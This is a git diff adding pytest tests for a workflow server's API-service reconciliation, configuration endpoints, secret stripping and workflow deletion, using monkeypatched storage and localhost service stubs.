+    assert publish_calls == [{  # exactly one publish call, carrying the stored key
+        "workflow_id": workflow_id,
+        "image": None,
+        "driver": "local",
+        "api_key": existing_key,
+    }]
+    assert result["apiKey"] == existing_key
+    assert writes[workflow_routes._api_service_key(workflow_id)]["apiKey"] == existing_key  # the saved record keeps the same key
+
+
+@pytest.mark.asyncio  # Reconcile must re-publish a service whose health check fails, reusing stored image, driver and key.
+async def test_reconcile_published_workflow_api_services_restarts_unhealthy_service(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workflow_id = "wf-1"
+    existing_key = "existing-api-key"
+    service_key = workflow_routes._api_service_key(workflow_id)
+    store: dict[str, Any] = {  # in-memory stand-in for Storage, seeded with one "running" service record
+        service_key: {
+            "workflowId": workflow_id,
+            "workflowName": "Demo Workflow",
+            "serviceUrl": "http://127.0.0.1:19000",
+            "invokeUrl": "http://127.0.0.1:19000/invoke",
+            "apiKey": existing_key,
+            "status": "running",
+            "driver": "docker",
+            "image": "custom-image:latest",
+        }
+    }
+    publish_calls: list[dict[str, Any]] = []
+
+    async def fake_list_keys(prefix: str) -> list[str]:
+        assert prefix == workflow_routes._API_SERVICE_PREFIX  # reconcile must list under the API-service prefix
+        return list(store.keys())
+
+    async def fake_read(key: Any, *_args: Any, **_kwargs: Any) -> Any:
+        return store.get(str(key))
+
+    async def fake_write(key: Any, value: Any) -> None:
+        store[str(key)] = value
+
+    async def fake_health(requested_id: str) -> dict[str, Any]:
+        assert requested_id == workflow_id
+        return {"ok": False, "published": True, "endpointOk": False}  # published, but the endpoint is failing
+
+    async def fake_prepare_registry(requested_id: str) -> tuple[dict[str, Any], int]:
+        assert requested_id == workflow_id
+        return {"name": "Demo Workflow"}, 123
+
+    async def fake_publish_workflow(
+        requested_id: str,
+        image: str | None = None,
+        driver: str | None = None,
+        api_key: str | None = None,
+    ) -> dict[str, Any]:
+        publish_calls.append({
+            "workflow_id": requested_id,
+            "image": image,
+            "driver": driver,
+            "api_key": api_key,
+        })
+        return {
+            "serviceUrl": "http://127.0.0.1:19001",  # a different port from the seeded record
+            "containerName": "flocks-wf-wf-1-rel-1",
+            "driver": driver,
+            "image": image,
+            "apiKey": api_key,
+        }
+
+    monkeypatch.setattr(workflow_routes.Storage, "list_keys", fake_list_keys)
+    monkeypatch.setattr(workflow_routes.Storage, "read", fake_read)
+    monkeypatch.setattr(workflow_routes.Storage, "write", fake_write)
+    monkeypatch.setattr(workflow_routes, "get_workflow_health", fake_health)
+    monkeypatch.setattr(workflow_routes, "_prepare_workflow_api_registry", fake_prepare_registry)
+    monkeypatch.setattr(workflow_routes, "publish_workflow", fake_publish_workflow)
+
+    result = await workflow_routes.reconcile_published_workflow_api_services()
+
+    assert result["checked"] == 1
+    assert result["restarted"] == 1
+    assert publish_calls == [{  # the re-publish reuses the values stored on the record
+        "workflow_id": workflow_id,
+        "image": "custom-image:latest",
+        "driver": "docker",
+        "api_key": existing_key,
+    }]
+    assert store[service_key]["status"] == "running"
+    assert store[service_key]["apiKey"] == existing_key
+    assert store[service_key]["serviceUrl"] == "http://127.0.0.1:19001"  # record now holds the URL returned by publish
+    assert store[service_key]["invokeUrl"] == "http://127.0.0.1:19001/invoke"  # invoke URL follows the new service URL
+
+
+@pytest.mark.asyncio  # A "stopped" record that has no stoppedAt field must be checked and restarted, not skipped.
+async def test_reconcile_published_workflow_api_services_restarts_health_marked_stopped_service(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workflow_id = "wf-health-stopped"
+    service_key = workflow_routes._api_service_key(workflow_id)
+    store: dict[str, Any] = {  # in-memory stand-in for Storage
+        service_key: {
+            "workflowId": workflow_id,
+            "status": "stopped",  # note: no "stoppedAt" key on this record
+            "apiKey": "existing-api-key",
+        }
+    }
+    publish_calls: list[str] = []  # workflow ids passed to the fake publish_workflow
+
+    async def fake_list_keys(prefix: str) -> list[str]:
+        assert prefix == workflow_routes._API_SERVICE_PREFIX
+        return list(store.keys())
+
+    async def fake_read(key: Any, *_args: Any, **_kwargs: Any) -> Any:
+        return store.get(str(key))
+
+    async def fake_write(key: Any, value: Any) -> None:
+        store[str(key)] = value
+
+    async def fake_health(requested_id: str) -> dict[str, Any]:
+        assert requested_id == workflow_id
+        return {"ok": False, "published": False}
+
+    async def fake_prepare_registry(requested_id: str) -> tuple[dict[str, Any], int]:
+        assert requested_id == workflow_id
+        return {"name": "Demo Workflow"}, 123
+
+    async def fake_publish_workflow(
+        requested_id: str,
+        image: str | None = None,
+        driver: str | None = None,
+        api_key: str | None = None,
+    ) -> dict[str, Any]:
+        publish_calls.append(requested_id)
+        return {
+            "serviceUrl": "http://127.0.0.1:19002",
+            "containerName": "local-wf-health-stopped",
+            "driver": driver or "local",
+            "apiKey": api_key,
+        }
+
+    monkeypatch.setattr(workflow_routes.Storage, "list_keys", fake_list_keys)
+    monkeypatch.setattr(workflow_routes.Storage, "read", fake_read)
+    monkeypatch.setattr(workflow_routes.Storage, "write", fake_write)
+    monkeypatch.setattr(workflow_routes, "get_workflow_health", fake_health)
+    monkeypatch.setattr(workflow_routes, "_prepare_workflow_api_registry", fake_prepare_registry)
+    monkeypatch.setattr(workflow_routes, "publish_workflow", fake_publish_workflow)
+
+    result = await workflow_routes.reconcile_published_workflow_api_services()
+
+    assert result["checked"] == 1
+    assert result["restarted"] == 1
+    assert result["skipped"] == 0
+    assert publish_calls == [workflow_id]  # published exactly once
+    assert store[service_key]["status"] == "running"  # the stored record is flipped back to running
+
+
+@pytest.mark.asyncio  # A "stopped" record that carries stoppedAt must be skipped without any health probe.
+async def test_reconcile_published_workflow_api_services_skips_manually_stopped_service(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workflow_id = "wf-manual-stopped"
+    service_key = workflow_routes._api_service_key(workflow_id)
+    store: dict[str, Any] = {
+        service_key: {
+            "workflowId": workflow_id,
+            "status": "stopped",
+            "stoppedAt": 123,  # this field is what separates this case from the restart test for a stopped record
+            "apiKey": "existing-api-key",
+        }
+    }
+    health_calls: list[str] = []  # records any health probe so the test can assert there were none
+
+    async def fake_list_keys(prefix: str) -> list[str]:
+        assert prefix == workflow_routes._API_SERVICE_PREFIX
+        return list(store.keys())
+
+    async def fake_read(key: Any, *_args: Any, **_kwargs: Any) -> Any:
+        return store.get(str(key))
+
+    async def fake_health(requested_id: str) -> dict[str, Any]:
+        health_calls.append(requested_id)
+        return {"ok": True}
+
+    monkeypatch.setattr(workflow_routes.Storage, "list_keys", fake_list_keys)
+    monkeypatch.setattr(workflow_routes.Storage, "read", fake_read)
+    monkeypatch.setattr(workflow_routes, "get_workflow_health", fake_health)
+
+    result = await workflow_routes.reconcile_published_workflow_api_services()
+
+    assert result["skipped"] == 1
+    assert result["checked"] == 0
+    assert health_calls == []  # the health function must never have been called
+
+
+@pytest.mark.asyncio  # Reading one service record must return it as stored, with no health probe and no write.
+async def test_get_workflow_service_does_not_probe_runtime_health(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workflow_id = "wf-service-read"
+    service = {
+        "workflowId": workflow_id,
+        "status": "running",
+        "serviceUrl": "http://127.0.0.1:19000",
+    }
+    writes: list[Any] = []  # any Storage.write call lands here
+    health_calls: list[str] = []  # any health probe lands here
+
+    async def fake_read(key: Any, *_args: Any, **_kwargs: Any) -> Any:
+        assert str(key) == workflow_routes._api_service_key(workflow_id)  # only the service key may be read
+        return service
+
+    async def fake_write(key: Any, value: Any) -> None:
+        writes.append((key, value))
+
+    async def fake_health(requested_id: str) -> dict[str, Any]:
+        health_calls.append(requested_id)
+        return {"ok": False, "published": False}
+
+    monkeypatch.setattr(workflow_routes.Storage, "read", fake_read)
+    monkeypatch.setattr(workflow_routes.Storage, "write", fake_write)
+    monkeypatch.setattr(workflow_routes, "get_workflow_health", fake_health)
+
+    result = await workflow_routes.get_workflow_service(workflow_id)
+
+    assert result is service  # identity check: the very object returned by Storage.read
+    assert health_calls == []
+    assert writes == []
+
+
+@pytest.mark.asyncio  # Listing must report a stale "running" record as stopped in the response without touching storage.
+async def test_list_workflow_services_marks_stale_running_service_stopped_in_response(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workflow_id = "wf-stale-service"
+    service_key = workflow_routes._api_service_key(workflow_id)
+    service = {
+        "workflowId": workflow_id,
+        "workflowName": "Stale Workflow",
+        "serviceUrl": "http://127.0.0.1:19002",
+        "invokeUrl": "http://127.0.0.1:19002/invoke",
+        "apiKey": "existing-api-key",
+        "status": "running",
+        "publishedAt": 123,
+        "driver": "local",
+    }
+    store: dict[str, Any] = {service_key: service}
+
+    async def fake_list_keys(prefix: str) -> list[str]:
+        assert prefix == workflow_routes._API_SERVICE_PREFIX
+        return [service_key]
+
+    async def fake_read(key: Any, *_args: Any, **_kwargs: Any) -> Any:
+        return store.get(str(key))  # every key other than service_key reads as None
+
+    writes: list[tuple[Any, Any]] = []
+
+    async def fake_write(key: Any, value: Any) -> None:
+        writes.append((key, value))
+
+    monkeypatch.setattr(workflow_routes.Storage, "list_keys", fake_list_keys)
+    monkeypatch.setattr(workflow_routes.Storage, "read", fake_read)
+    monkeypatch.setattr(workflow_routes.Storage, "write", fake_write)
+
+    result = await workflow_routes.list_workflow_services()
+
+    assert result[0]["status"] == "stopped"
+    assert result[0]["health"] == {  # exact health payload expected for the stale record
+        "ok": False,
+        "stale": True,
+        "reason": "missing_runtime",
+    }
+    assert "stoppedAt" not in result[0]
+    assert store[service_key]["status"] == "running"  # the stored record itself is left unmodified
+    assert writes == []  # and nothing is written back to storage
diff --git a/tests/server/routes/test_workflow_routes_visibility.py b/tests/server/routes/test_workflow_routes_visibility.py
new file mode 100644
index 000000000..0773c329b
--- /dev/null
+++ b/tests/server/routes/test_workflow_routes_visibility.py
@@ -0,0 +1,55 @@
+from __future__ import annotations
+
+import json
+from pathlib import Path
+
+import pytest
+
+from flocks.server.routes import workflow as workflow_routes
+
+
+def _write_workflow(  # Helper: create <root>/<workflow_id>/workflow.json and, when `meta` is given, meta.json.
+    root: Path,
+    workflow_id: str,
+    *,
+    name: str,
+    meta: dict | None = None,
+) -> None:
+    workflow_dir = root / workflow_id
+    workflow_dir.mkdir(parents=True, exist_ok=True)
+    (workflow_dir / "workflow.json").write_text(
+        json.dumps(
+            {
+                "name": name,
+                "start": "n1",
+                "nodes": [{"id": "n1", "type": "python", "code": "outputs['ok'] = True"}],  # a single python node
+                "edges": [],
+            }
+        ),
+        encoding="utf-8",
+    )
+    if meta is not None:  # meta.json is only written on request; an empty dict still writes the file
+        (workflow_dir / "meta.json").write_text(json.dumps(meta), encoding="utf-8")
+
+
+def test_list_workflows_from_fs_skips_hidden_templates(  # A workflow with hidden/templateOnly meta must not be listed.
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workflow_root = tmp_path / ".flocks" / "plugins" / "workflows"
+    _write_workflow(workflow_root, "visible", name="visible")  # no meta.json for this one
+    _write_workflow(
+        workflow_root,
+        "__hidden_template",
+        name="hidden template",
+        meta={"hidden": True, "templateOnly": True},
+    )
+    monkeypatch.setattr(
+        workflow_routes,
+        "_all_scan_dirs",
+        lambda: [(workflow_root, "project")],  # restrict scanning to the temp directory
+    )
+
+    items = workflow_routes._list_workflows_from_fs()
+
+    assert [item["id"] for item in items] == ["visible"]  # only the visible workflow is returned
diff --git a/tests/server/routes/test_workflow_trigger_routes.py b/tests/server/routes/test_workflow_trigger_routes.py
index 845100e51..f183f6e0d 100644
--- a/tests/server/routes/test_workflow_trigger_routes.py
+++ b/tests/server/routes/test_workflow_trigger_routes.py
@@ -1,5 +1,7 @@
 from __future__ import annotations
 
+import json
+from pathlib import Path
 from types import SimpleNamespace
 from typing import Any
 
@@ -7,6 +9,7 @@
 from httpx import AsyncClient
 
 from flocks.server.routes import workflow as workflow_routes
+from flocks.workflow import fs_store
 
 
 @pytest.mark.asyncio
@@ -106,6 +109,452 @@ async def _fake_statuses(_workflow_id: str, _workflow_json: dict[str, Any]) -> l
     assert response.json() == []
 
 
+@pytest.mark.asyncio  # GET config must return the config-file template and the live runtime state as separate sections.
+async def test_workflow_config_response_keeps_template_separate_from_runtime(
+    client: AsyncClient,
+    monkeypatch: pytest.MonkeyPatch,
+    tmp_path: Path,
+) -> None:
+    config_dir = tmp_path / "wf-1"
+    config_dir.mkdir()
+    (config_dir / "config.json").write_text(  # on-disk template: syslog disabled, api enabled
+        json.dumps(
+            {
+                "version": 1,
+                "kind": "workflow.integration-config",
+                "workflow": {"id": "wf-1"},
+                "triggers": [
+                    {
+                        "id": "syslog-default",
+                        "type": "syslog",
+                        "enabled": False,
+                    },
+                    {
+                        "id": "api-default",
+                        "type": "api",
+                        "enabled": True,
+                    },
+                ],
+            }
+        ),
+        encoding="utf-8",
+    )
+
+    monkeypatch.setattr(
+        workflow_routes,
+        "_workflow_config_dir",
+        lambda _workflow_id, _workflow_data=None: config_dir,  # always resolve to the temp config dir
+    )
+    monkeypatch.setattr(
+        workflow_routes,
+        "_read_workflow_from_fs",
+        lambda workflow_id: {
+            "id": workflow_id,
+            "name": "demo",
+            "workflowJson": {
+                "start": "n1",
+                "nodes": [{"id": "n1", "type": "python", "code": "result = {'ok': True}"}],
+                "edges": [],
+                "triggers": [
+                    {
+                        "id": "syslog-default",
+                        "type": "syslog",
+                        "enabled": True,  # differs on purpose from the template's enabled=False
+                    }
+                ],
+            },
+        } if workflow_id == "wf-1" else None,
+    )
+
+    stored_writes: dict[str, Any] = {}  # last value written per storage key
+
+    async def _fake_read(key: Any, _model: Any = None) -> dict[str, Any] | None:
+        if key == workflow_routes._api_service_key("wf-1"):
+            return {
+                "workflowId": "wf-1",
+                "status": "stopped",
+                "driver": "local",
+            }
+        return None  # in particular, no integration config exists in storage yet
+
+    async def _fake_write(key: Any, value: Any) -> None:
+        stored_writes[str(key)] = value
+
+    async def _fake_statuses(_workflow_id: str, _workflow_json: dict[str, Any]) -> list[dict[str, Any]]:
+        return [
+            {
+                "workflowId": "wf-1",
+                "triggerId": "syslog-default",
+                "triggerType": "syslog",
+                "state": "listening",
+            }
+        ]
+
+    monkeypatch.setattr(workflow_routes.Storage, "read", _fake_read)
+    monkeypatch.setattr(workflow_routes.Storage, "write", _fake_write)
+    monkeypatch.setattr(
+        workflow_routes,
+        "default_trigger_runtime",
+        SimpleNamespace(get_workflow_trigger_statuses=_fake_statuses),  # stand-in exposing only the status lookup
+    )
+
+    response = await client.get("/api/workflow/wf-1/config")
+
+    assert response.status_code == 200, response.text
+    body = response.json()
+    assert body["exists"] is True
+    assert body["source"] == "file_migrated"
+    assert stored_writes[workflow_routes._workflow_integration_config_key("wf-1")] == body["config"]  # file config was saved to storage
+    assert body["config"]["triggers"][0]["enabled"] is False  # template value comes from config.json
+    assert body["config"]["triggers"][1]["type"] == "api"
+    assert body["runtime"]["publish"]["status"] == "stopped"
+    assert body["runtime"]["publish"]["enabled"] is False
+    assert body["runtime"]["triggers"][0]["trigger"]["enabled"] is True  # runtime value comes from workflowJson
+    assert body["runtime"]["triggers"][0]["status"]["state"] == "listening"
+
+
+@pytest.mark.asyncio  # When storage already holds an integration config, GET config must use it over config.json.
+async def test_workflow_config_prefers_storage_over_config_file(
+    client: AsyncClient,
+    monkeypatch: pytest.MonkeyPatch,
+    tmp_path: Path,
+) -> None:
+    config_dir = tmp_path / "wf-1"
+    config_dir.mkdir()
+    (config_dir / "config.json").write_text(  # competing on-disk config that must lose to storage
+        json.dumps(
+            {
+                "version": 1,
+                "kind": "workflow.integration-config",
+                "workflow": {"id": "wf-1"},
+                "triggers": [{"id": "file-syslog", "type": "syslog", "enabled": True}],
+            }
+        ),
+        encoding="utf-8",
+    )
+
+    stored_config = {
+        "version": 1,
+        "kind": "workflow.integration-config",
+        "workflow": {"id": "wf-1"},
+        "updatedAt": 1,
+        "publish": {"type": "api_service"},
+        "triggers": [{"id": "storage-api", "type": "api", "enabled": True}],
+    }
+    write_calls: list[tuple[Any, Any]] = []  # every Storage.write call as (key, value)
+
+    monkeypatch.setattr(
+        workflow_routes,
+        "_workflow_config_dir",
+        lambda _workflow_id, _workflow_data=None: config_dir,
+    )
+    monkeypatch.setattr(
+        workflow_routes,
+        "_read_workflow_from_fs",
+        lambda workflow_id: {
+            "id": workflow_id,
+            "name": "demo",
+            "workflowJson": {"start": "n1", "nodes": [], "edges": [], "triggers": []},
+        } if workflow_id == "wf-1" else None,
+    )
+
+    async def _fake_read(key: Any, _model: Any = None) -> dict[str, Any] | None:
+        if key == workflow_routes._workflow_integration_config_key("wf-1"):
+            return stored_config  # storage already has a config for wf-1
+        return None
+
+    async def _fake_write(key: Any, value: Any) -> None:
+        write_calls.append((key, value))
+
+    async def _fake_statuses(_workflow_id: str, _workflow_json: dict[str, Any]) -> list[dict[str, Any]]:
+        return []
+
+    monkeypatch.setattr(workflow_routes.Storage, "read", _fake_read)
+    monkeypatch.setattr(workflow_routes.Storage, "write", _fake_write)
+    monkeypatch.setattr(
+        workflow_routes,
+        "default_trigger_runtime",
+        SimpleNamespace(get_workflow_trigger_statuses=_fake_statuses),
+    )
+
+    response = await client.get("/api/workflow/wf-1/config")
+
+    assert response.status_code == 200, response.text
+    body = response.json()
+    assert body["source"] == "storage"
+    assert body["config"]["triggers"] == [{"id": "storage-api", "type": "api", "enabled": True}]  # storage triggers, not the file's
+    assert all(key != workflow_routes._workflow_integration_config_key("wf-1") for key, _value in write_calls)  # config not rewritten
+
+
+@pytest.mark.asyncio  # PUT config must store a secret-free template in storage and leave the runtime section untouched.
+async def test_update_workflow_config_writes_template_without_mutating_runtime(
+    client: AsyncClient,
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workspace = tmp_path / "workspace"
+    workflow_id = "wf-1"
+    workflow_dir = workspace / ".flocks" / "plugins" / "workflows" / workflow_id
+    workflow_dir.mkdir(parents=True)
+    (workflow_dir / "workflow.json").write_text(  # real workflow files on disk; _read_workflow_from_fs is not stubbed
+        json.dumps(
+            {
+                "start": "n1",
+                "nodes": [{"id": "n1", "type": "python", "code": "result = {'ok': True}"}],
+                "edges": [],
+                "triggers": [{"id": "syslog-default", "type": "syslog", "enabled": True}],
+            }
+        ),
+        encoding="utf-8",
+    )
+    (workflow_dir / "meta.json").write_text(
+        json.dumps(
+            {
+                "name": "Demo Workflow",
+                "category": "default",
+                "source": "project",
+                "status": "draft",
+                "createdAt": 1,
+                "updatedAt": 1,
+            }
+        ),
+        encoding="utf-8",
+    )
+    monkeypatch.chdir(workspace)
+    monkeypatch.setattr(fs_store, "_workspace_root", None)  # NOTE(review): presumably resets a cached workspace root - confirm
+
+    original_storage_read = workflow_routes.Storage.read  # kept so unrelated keys fall through to the real read
+    stored_writes: dict[str, Any] = {}
+
+    async def _fake_storage_read(key: Any, *args: Any, **kwargs: Any) -> Any:
+        if key == workflow_routes._api_service_key(workflow_id):
+            return {  # pretend a running published service with its own API key already exists
+                "workflowId": workflow_id,
+                "workflowName": "Demo Workflow",
+                "serviceUrl": "http://127.0.0.1:19000",
+                "invokeUrl": "http://127.0.0.1:19000/invoke",
+                "apiKey": "runtime-secret",
+                "status": "running",
+                "driver": "local",
+                "publishedAt": 123,
+            }
+        return await original_storage_read(key, *args, **kwargs)
+
+    async def _fake_storage_write(key: Any, value: Any) -> None:
+        stored_writes[str(key)] = value  # capture the write; the real Storage.write is not invoked
+
+    async def _fake_statuses(_workflow_id: str, _workflow_json: dict[str, Any]) -> list[dict[str, Any]]:
+        return [
+            {
+                "workflowId": workflow_id,
+                "triggerId": "syslog-default",
+                "triggerType": "syslog",
+                "state": "listening",
+            }
+        ]
+
+    monkeypatch.setattr(workflow_routes.Storage, "read", _fake_storage_read)
+    monkeypatch.setattr(workflow_routes.Storage, "write", _fake_storage_write)
+    monkeypatch.setattr(
+        workflow_routes,
+        "default_trigger_runtime",
+        SimpleNamespace(get_workflow_trigger_statuses=_fake_statuses),
+    )
+
+    response = await client.put(
+        f"/api/workflow/{workflow_id}/config",
+        json={
+            "version": 1,
+            "kind": "workflow.integration-config",
+            "workflow": {"id": workflow_id},
+            "runtime": {"publish": {"enabled": False}},  # client-sent runtime section; must not be persisted
+            "publish": {
+                "type": "api_service",
+                "enabled": False,
+                "apiKey": "template-secret",  # raw secret; expected to be replaced by a "configured" flag
+            },
+            "triggers": [
+                {
+                    "id": "api-default",
+                    "type": "api",
+                    "source": {
+                        "method": "POST",
+                        "path": f"/api/workflow/{workflow_id}/run",
+                        "client_secret": "nested-secret",  # nested secret; expected to be stripped as well
+                        "secretRef": "workflow/api-key",  # a reference; expected to be kept as-is
+                    },
+                },
+                {
+                    "id": "syslog-default",
+                    "type": "syslog",
+                    "enabled": False,
+                },
+            ],
+        },
+    )
+
+    assert response.status_code == 200, response.text
+    body = response.json()
+    config_path = workflow_dir / "config.json"
+    assert body["path"] == str(config_path)
+    assert body["source"] == "storage"
+    assert not config_path.exists()  # the path is reported, but no config.json is created on disk
+    written = stored_writes[workflow_routes._workflow_integration_config_key(workflow_id)]
+    assert written == body["config"]
+    assert "runtime" not in written
+    assert written["workflow"]["id"] == workflow_id
+    assert written["workflow"]["name"] == "Demo Workflow"  # the name was not in the request body
+    assert written["publish"]["enabled"] is False
+    assert written["publish"]["apiKeyConfigured"] is True
+    assert "apiKey" not in written["publish"]
+    assert written["triggers"][0]["type"] == "api"
+    assert written["triggers"][0]["source"]["client_secretConfigured"] is True
+    assert written["triggers"][0]["source"]["secretRef"] == "workflow/api-key"
+    assert "client_secret" not in written["triggers"][0]["source"]
+    assert body["runtime"]["publish"]["enabled"] is True  # runtime is still enabled although the template says False
+    assert body["runtime"]["publish"]["apiKeyConfigured"] is True
+    assert body["runtime"]["triggers"][0]["status"]["state"] == "listening"
+
+
+@pytest.mark.asyncio  # DELETE /service must stop the workflow service and remove its stored service record.
+async def test_delete_workflow_service_removes_runtime_service_record(
+    client: AsyncClient,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workflow_id = "wf-service-delete"
+    await workflow_routes.Storage.write(  # seed a service record through the unpatched Storage API
+        workflow_routes._api_service_key(workflow_id),
+        {
+            "workflowId": workflow_id,
+            "workflowName": "Demo Workflow",
+            "serviceUrl": "http://127.0.0.1:19000",
+            "invokeUrl": "http://127.0.0.1:19000/invoke",
+            "apiKey": "runtime-secret",
+            "status": "running",
+            "driver": "local",
+            "publishedAt": 123,
+        },
+    )
+    stopped: list[str] = []  # workflow ids passed to the fake stop function
+
+    async def _fake_stop_service(wid: str) -> dict[str, Any]:
+        stopped.append(wid)
+        return {"workflowId": wid, "status": "stopped"}
+
+    monkeypatch.setattr(workflow_routes, "stop_workflow_service", _fake_stop_service)
+
+    response = await client.delete(f"/api/workflow/{workflow_id}/service")
+
+    assert response.status_code == 200, response.text
+    assert response.json() == {"ok": True, "workflowId": workflow_id}
+    assert stopped == [workflow_id]  # stop was called exactly once for this workflow
+    assert await workflow_routes.Storage.read(workflow_routes._api_service_key(workflow_id)) is None  # record is gone
+
+
+@pytest.mark.asyncio  # PUT config whose body names a different workflow id than the URL must be rejected with 409.
+async def test_update_workflow_config_rejects_mismatched_workflow_id(
+    client: AsyncClient,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    monkeypatch.setattr(
+        workflow_routes,
+        "_read_workflow_from_fs",
+        lambda workflow_id: {
+            "id": workflow_id,
+            "name": "demo",
+            "workflowJson": {"start": "n1", "nodes": [], "edges": []},
+        } if workflow_id == "wf-1" else None,  # only wf-1 exists
+    )
+
+    response = await client.put(
+        "/api/workflow/wf-1/config",
+        json={
+            "version": 1,
+            "kind": "workflow.integration-config",
+            "workflow": {"id": "other-workflow"},  # deliberately differs from the "wf-1" in the URL
+            "publish": {},
+            "triggers": [],
+        },
+    )
+
+    assert response.status_code == 409, response.text
+    assert "does not match" in response.json()["message"]  # the error text is read from the "message" field
+
+
+@pytest.mark.asyncio  # DELETE workflow must remove its directories and storage keys, and stop its service and triggers.
+async def test_delete_workflow_cleans_directory_and_storage(
+    client: AsyncClient,
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workspace = tmp_path / "workspace"
+    workflow_id = "wf-delete"
+    workflow_dir = workspace / ".flocks" / "plugins" / "workflows" / workflow_id
+    workflow_dir.mkdir(parents=True)
+    (workflow_dir / "workflow.json").write_text(
+        json.dumps({"start": "n1", "nodes": [], "edges": []}),
+        encoding="utf-8",
+    )
+    (workflow_dir / "meta.json").write_text(
+        json.dumps({"name": "Delete Me", "category": "default", "status": "draft"}),
+        encoding="utf-8",
+    )
+    service_dir = workflow_routes.Config.get_data_path() / "workflow-services" / "workflows" / workflow_id  # under the data path
+    service_dir.mkdir(parents=True)
+    (service_dir / "snapshot.json").write_text("{}", encoding="utf-8")
+
+    monkeypatch.chdir(workspace)
+    monkeypatch.setattr(fs_store, "_workspace_root", None)  # NOTE(review): presumably resets a cached workspace root - confirm
+
+    storage_keys = [  # every storage key the test expects the delete to clear
+        workflow_routes._workflow_stats_key(workflow_id),
+        workflow_routes._workflow_integration_config_key(workflow_id),
+        workflow_routes._api_service_key(workflow_id),
+        workflow_routes._syslog_config_key(workflow_id),
+        workflow_routes._kafka_config_key(workflow_id),
+        f"workflow_poller_config/{workflow_id}",
+        f"workflow_registry/{workflow_id}",
+        f"workflow_runtime/{workflow_id}",
+        f"workflow_local_pid/{workflow_id}",
+        f"workflow_release/{workflow_id}/active",
+        f"workflow_release/{workflow_id}/rel-1",
+        workflow_routes._workflow_execution_key("exec-delete"),
+    ]
+    for key in storage_keys:
+        payload = {"workflowId": workflow_id}
+        if key == workflow_routes._workflow_execution_key("exec-delete"):
+            payload = {"id": "exec-delete", "workflowId": workflow_id}  # the execution record also carries its own id
+        await workflow_routes.Storage.write(key, payload)
+
+    stopped: list[Any] = []  # tuples recording the stop-service and trigger-restart calls
+
+    async def _fake_stop_service(wid: str) -> dict[str, Any]:
+        stopped.append(("service", wid))
+        return {"workflowId": wid, "status": "stopped"}
+
+    async def _fake_restart_workflow(wid: str, workflow_json: dict[str, Any]) -> dict[str, Any]:
+        stopped.append(("triggers", wid, workflow_json))
+        return {"syslog": {"state": "stopped"}}
+
+    monkeypatch.setattr(workflow_routes, "stop_workflow_service", _fake_stop_service)
+    monkeypatch.setattr(
+        workflow_routes,
+        "default_trigger_runtime",
+        SimpleNamespace(restart_workflow=_fake_restart_workflow),  # stand-in exposing only restart_workflow
+    )
+
+    response = await client.delete(f"/api/workflow/{workflow_id}")
+
+    assert response.status_code == 204, response.text
+    assert not workflow_dir.exists()
+    assert not service_dir.exists()
+    assert ("service", workflow_id) in stopped
+    assert ("triggers", workflow_id, {"triggers": []}) in stopped  # triggers are restarted with an empty trigger list
+    for key in storage_keys:
+        assert await workflow_routes.Storage.read(key) is None
+    assert await workflow_routes.Storage.list(f"workflow_release/{workflow_id}/") == []  # no release entries remain
+
+
 @pytest.mark.asyncio
 async def test_preview_trigger_mapping_returns_mapped_inputs(
     client: AsyncClient,
@@ -482,3 +931,201 @@ async def _fake_dispatch_event(**_kwargs: Any) -> dict[str, Any]:
         content=payload,
     )
     assert bad_response.status_code == 401, bad_response.text
+
+
+@pytest.mark.asyncio
+async def test_sync_workflow_config_writes_publish_and_trigger_capabilities(
+    client: AsyncClient,
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:  # Config sync should put the generated config into Storage (no config.json on disk) and omit raw API keys.
+    workspace = tmp_path / "workspace"
+    workflow_id = "wf-1"
+    workflow_dir = workspace / ".flocks" / "plugins" / "workflows" / workflow_id
+    workflow_dir.mkdir(parents=True)
+    (workflow_dir / "workflow.json").write_text(
+        json.dumps(
+            {
+                "start": "n1",
+                "nodes": [{"id": "n1", "type": "python", "code": "result = {'ok': True}"}],
+                "edges": [],
+                "triggers": [
+                    {
+                        "id": "hook-default",
+                        "type": "custom_webhook",
+                        "enabled": True,
+                        "source": {"method": "POST"},
+                        "auth": {"type": "api_key", "apiKey": "demo-secret"},
+                        "mapping": {"payload": "$.body"},
+                    }
+                ],
+            }
+        ),
+        encoding="utf-8",
+    )
+    (workflow_dir / "meta.json").write_text(
+        json.dumps(
+            {
+                "name": "Demo Workflow",
+                "description": None,
+                "category": "default",
+                "status": "draft",
+                "createdBy": None,
+                "createdAt": 1,
+                "updatedAt": 1,
+            }
+        ),
+        encoding="utf-8",
+    )
+    monkeypatch.chdir(workspace)
+    monkeypatch.setattr(fs_store, "_workspace_root", None)  # presumably resets a cached workspace root so it is re-resolved from the new cwd — confirm
+
+    original_storage_read = workflow_routes.Storage.read
+    stored_writes: dict[str, Any] = {}
+
+    async def _fake_storage_read(key: Any, *args: Any, **kwargs: Any) -> Any:
+        if key == workflow_routes._api_service_key(workflow_id):  # only the API-service record is faked
+            return {
+                "workflowId": workflow_id,
+                "workflowName": "Demo Workflow",
+                "serviceUrl": "http://127.0.0.1:19000",
+                "invokeUrl": "http://127.0.0.1:19000/invoke",
+                "apiKey": "service-secret",
+                "status": "running",
+                "driver": "local",
+                "publishedAt": 123,
+            }
+        return await original_storage_read(key, *args, **kwargs)  # every other key falls through to the real read
+
+    async def _fake_storage_write(key: Any, value: Any) -> None:
+        stored_writes[str(key)] = value  # capture writes in memory, keyed by str(key)
+
+    monkeypatch.setattr(workflow_routes.Storage, "read", _fake_storage_read)
+    monkeypatch.setattr(workflow_routes.Storage, "write", _fake_storage_write)
+
+    response = await client.post(f"/api/workflow/{workflow_id}/config/sync")
+
+    assert response.status_code == 200, response.text
+    config_path = workflow_dir / "config.json"
+    assert response.json()["path"] == str(config_path)
+    assert response.json()["source"] == "storage"
+    assert not config_path.exists()  # the path is reported in the response, but no file is created
